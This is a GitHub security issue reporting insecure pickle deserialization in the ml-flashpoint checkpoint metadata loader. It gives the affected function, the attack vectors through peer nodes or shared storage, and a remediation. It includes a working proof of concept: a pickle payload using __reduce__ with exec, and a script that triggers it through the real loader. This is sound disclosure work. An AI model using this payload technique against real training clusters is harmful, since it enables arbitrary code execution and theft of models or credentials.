-
Notifications
You must be signed in to change notification settings - Fork 7
[Security Vulnerability] Insecure Pickle Deserialization in Checkpoint Metadata Loading ml-flashpoint #74
Description
Summary
DefaultMLFlashpointCheckpointLoader.read_metadata() in src/ml_flashpoint/core/checkpoint_loader.py uses pickle.load() to deserialize .metadata files from checkpoint directories. These files can originate from untrusted peer nodes in a distributed training cluster (via ReplicationManager.sync_bulk_retrieve) or from shared storage. An attacker who controls a peer node or can write to shared checkpoint storage can craft a malicious pickle payload that achieves arbitrary code execution on any node that loads the checkpoint metadata.
Description
- Type: Insecure Deserialization (CWE-502)
- Source:
.metadatafiles read fromPath(checkpoint_id.data) / object_name(line 152). In distributed deployments, these files arrive viasync_bulk_retrievefrom peer nodes over the network, or from shared filesystem storage accessible to multiple nodes. - Sink:
pickle.load(f)at lines 154-155 ofcheckpoint_loader.py. No validation, allowlisting, or sandboxing is applied to the deserialized data. - Impact: Arbitrary code execution with the privileges of the ML training process. An attacker can exfiltrate model weights, training data, credentials, or pivot to other systems in the cluster. In multi-tenant or federated training scenarios, a single compromised or malicious participant can compromise all other nodes.
Attack Vectors
-
Malicious peer node: In a distributed training cluster,
_try_retrieve_object_if_missing()callssync_bulk_retrieve()to fetch checkpoint objects from peer nodes. A compromised peer can serve a crafted.metadatapickle payload. When any other node callsread_metadata()(triggered by_compute_retrieval_plan()orget_latest_complete_checkpoint()), the malicious pickle executes arbitrary code. -
Shared storage poisoning: In shared-storage deployments, an attacker with write access to the checkpoint directory can replace or inject a malicious
.metadatafile. Any node loading that checkpoint will execute the payload.
Affected
- Package:
ml-flashpoint(pip) - Repository: google/ml-flashpoint
- File:
src/ml_flashpoint/core/checkpoint_loader.py - Function:
DefaultMLFlashpointCheckpointLoader.read_metadata()(lines 147-158) - Versions: All versions (as of commit on main branch)
References
PoC
A proof-of-concept demonstrates arbitrary code execution by crafting a malicious .metadata pickle file that writes a marker file when deserialized.
payload.py — generates a malicious .metadata file using pickle.dump() with a class that overrides __reduce__ to execute arbitrary code:
import os
import pickle
POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
METADATA_FILE = os.path.join(CHECKPOINT_DIR, ".metadata")
class MaliciousPayload:
def __reduce__(self):
return (exec, ("open('pwned.txt','w').write('pwned')",))
def generate():
os.makedirs(CHECKPOINT_DIR, exist_ok=True)
with open(METADATA_FILE, "wb") as f:
pickle.dump(MaliciousPayload(), f)
return METADATA_FILEexploit.py — invokes the real DefaultMLFlashpointCheckpointLoader.read_metadata() from the built ml-flashpoint package:
import os
import sys
POC_DIR = os.path.dirname(os.path.abspath(__file__))
CHECKPOINT_DIR = os.path.join(POC_DIR, "fake_checkpoint")
sys.path.insert(0, POC_DIR)
import payload
from ml_flashpoint.core.checkpoint_id_types import CheckpointContainerId
from ml_flashpoint.core.checkpoint_loader import DefaultMLFlashpointCheckpointLoader
if os.path.exists("pwned.txt"):
os.remove("pwned.txt")
payload.generate()
loader = DefaultMLFlashpointCheckpointLoader(None, None)
loader.read_metadata(CheckpointContainerId(CHECKPOINT_DIR), ".metadata")
if os.path.exists("pwned.txt"):
print("EXPLOIT_SUCCESS:", open("pwned.txt").read())
else:
sys.exit(1)Running the exploit creates pwned.txt, proving arbitrary code execution via pickle.load() in read_metadata().
Remediation
Replace pickle.load() with a safe deserialization method.